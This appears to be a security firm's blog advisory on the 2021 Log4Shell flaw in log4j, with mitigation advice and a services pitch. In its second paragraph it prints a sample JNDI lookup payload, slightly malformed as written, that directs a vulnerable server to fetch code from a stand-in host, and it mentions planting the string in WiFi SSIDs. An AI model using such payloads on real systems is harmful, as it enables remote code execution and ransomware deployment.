Christmas has come early for threat actors

On December 10th 2021, a vulnerability in the popular Java logging framework log4j dropped on Twitter, originating from a Chinese blogger ‘yangyang’. Dubbed “Log4Shell”, the vulnerability works when an application or library using the log4j framework processes an untrusted string containing JNDI lookup information. The vulnerability enables an attacker to download and execute arbitrary code on target systems.

{$jndi:ldap:example.com/a:389/badcode} – That’s all there is to exploiting some of these vulnerable systems. The attacker’s server would contain the java payload and would likely install a RAT or ransomware payload, and then attempt movement within an organization.

This vulnerability scores a 10 on the CVSS rating, the highest possible. Since log4j is a very popular library, everything from Minecraft to certain Java power webservers/websites is affected. 

According to Twitter user @forwardsecrecy it appears that the vulnerability can be exploited on certain devices passively by inserting the string into WiFi SSIDs.

It is likely that many vulnerable systems are searchable on Google and on engines such as Shodan. 

Mitigation

We expect to see many more vulnerable areas come to light in the near future. Data breaches and ransomware attacks are sure to strike.

If you have any systems running Java, you should immediately triage to determine if log4j is present and patch accordingly. If one cannot patch, a JVM argument is available to mitigate the issue.

According to the original blog post, Java Development Kit (JDK) versions greater than 6u211, 7u201, 8u191, and 11.0.1 are not vulnerable to the main LDAP vector but may be exploitable by other means. They also claim that certain JDK configurations may stop exploitation.

If your company has been impacted by this vulnerability or needs assistance patching, Purple Folder can help. Schedule a quick chat to discuss what can be done to mitigate before it is too late.